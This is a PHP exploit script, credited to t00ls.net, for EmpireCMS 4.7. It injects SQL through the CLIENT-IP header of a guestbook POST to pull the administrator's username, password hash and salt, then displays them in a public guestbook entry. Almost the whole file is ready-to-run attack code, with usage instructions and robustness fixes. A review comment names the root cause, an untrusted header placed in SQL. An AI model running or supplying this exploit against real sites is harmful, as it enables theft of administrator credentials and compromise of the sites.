EmpireCMS 4.7 SQL injection exploit (via the guestbook CLIENT-IP header)

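<?php
/*
 * Exploit for EmpireCMS 4.7: SQL injection through the guestbook handler.
 *
 * The payload is delivered in the CLIENT-IP request header of an ordinary
 * guestbook POST (enews=AddGbook).  It closes the quoted value and the VALUES
 * tuple the handler is building, appends a second tuple whose text column is
 * a subquery over phome_enewsuser (username_password_rnd for userid=1) and
 * opens a MySQL comment so the rest of the statement is ignored.  The injected
 * row then appears as a normal guestbook entry, which is why the final message
 * points at /e/tool/gbook/?bid=1.
 *
 * NOTE(review): that the handler copies CLIENT-IP into SQL without escaping is
 * inferred from the payload, not visible here.  It is the classic "trust a
 * client-supplied IP header" mistake: any server code that records such a
 * header must treat it as untrusted input and use a parameterised query.
 *
 * Requirements (from the original banner): PHP >= 5 and MySQL >= 4.1.
 *
 * Usage: php exploit.php host path [port]
 *   host  target server (TCP connection and Host header)
 *   path  web path of the EmpireCMS install, e.g. "/" or "/cms"
 *   port  optional TCP port, default 80
 *
 * Fixes relative to the original listing:
 *   - the payload is kept on ONE line (a line break inside a header value
 *     terminates the header and pushes the remainder into the body);
 *   - fsockopen gets a timeout and its error string is reported;
 *   - the write is checked and the socket is always closed;
 *   - usage and connection errors exit non-zero;
 *   - a trailing "/" in path no longer yields "//e/..." request targets.
 */

/**
 * Build the raw HTTP/1.1 request carrying the injection payload.
 *
 * @param string $host  value for the Host and Referer headers (host or host:port)
 * @param string $path  web path of the install, with or without trailing "/"
 * @return string       complete request (headers + body), CRLF-terminated
 */
function build_exploit_request($host, $path)
{
    $base = rtrim($path, '/');

    // Plain guestbook submission; every field is filler except the
    // enews=AddGbook action selector.
    $body = "name=11ttt&email=111&call=&lytext=1111&enews=AddGbook";

    // SQL payload for the CLIENT-IP header.  Must stay on one line: a newline
    // inside a header value ends the header.
    $payload = "aaaaaaaa',0,1,''),('t00lsxxxx','t00lsxxxxx','','2008-05-28 15:44:17',"
        . "(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),"
        . "'',1,'1111',0,0,'')/*";

    $headers = array(
        "POST " . $base . "/e/enews/index.php HTTP/1.1",
        "Referer: http://" . $host . $base . "/e/tool/gbook/?bid=1",
        "Accept-Language: zh-cn",
        "Content-Type: application/x-www-form-urlencoded",
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)",
        "CLIENT-IP: " . $payload,
        "Host: " . $host,
        "Content-Length: " . strlen($body), // byte length, which is what HTTP wants
        "Cookie: ecmsgbookbid=1;",
        "Connection: Close",
    );

    return implode("\r\n", $headers) . "\r\n\r\n" . $body;
}

/**
 * Send a raw request and return everything the server sends back.
 *
 * @param string $host     host to connect to
 * @param int    $port     TCP port
 * @param string $request  complete request text
 * @param int    $timeout  connect/read timeout in seconds
 * @return string|false    raw response, or false on connect/write failure
 *                         (the reason has already been echoed)
 */
function send_raw_request($host, $port, $request, $timeout = 10)
{
    $errno = 0;
    $errstr = '';
    $sock = @fsockopen($host, $port, $errno, $errstr, $timeout);
    if (!$sock) {
        echo "No response from " . $host . ":" . $port . " (" . $errstr . ")\n";
        return false;
    }
    echo "[+]connected to the site!\r\n";
    echo "[+]sending data now\r\n";

    $written = fwrite($sock, $request);
    if ($written === false || $written < strlen($request)) {
        echo "[-]short write to " . $host . "\n";
        fclose($sock);
        return false;
    }

    // Connection: Close makes the server end the stream, so read to EOF; the
    // timeout keeps a silent server from hanging the script forever.
    stream_set_timeout($sock, $timeout);
    $response = '';
    while (!feof($sock)) {
        $chunk = fread($sock, 1024);
        if ($chunk === false || $chunk === '') {
            // '' while !feof means the read timed out - stop instead of spinning
            break;
        }
        $response .= $chunk;
    }
    fclose($sock);
    return $response;
}

// ---- command-line entry point ----------------------------------------------
print_r("
+------------------------------------------------------------------+
Exploit For EmpireCMS47
Just work as php>=5&mysql>=4.1
BY t00ls.net
+------------------------------------------------------------------+
");

if ($argc < 3) {
    echo "Usage: php " . $argv[0] . " host path [port]\n";
    echo "host: target server \n";
    echo "path: path to EmpireCMS47\n";
    echo "port: TCP port, default 80\n";
    echo "Example:\r\n";
    echo "php " . $argv[0] . " localhost /\n";
    exit(1);
}
$host = $argv[1];
$path = $argv[2];
$port = isset($argv[3]) ? (int) $argv[3] : 80;
// Host header (and the URL printed at the end) carry the port only when it
// is not the HTTP default.
$hostHdr = ($port === 80) ? $host : $host . ":" . $port;

$resp = send_raw_request($host, $port, build_exploit_request($hostHdr, $path));
if ($resp === false) {
    exit(1);
}
echo $resp;
echo "[+]done!\r\n";
echo "[+]go to http://" . $hostHdr . rtrim($path, '/') . "/e/tool/gbook/?bid=1 see the hash,good luck";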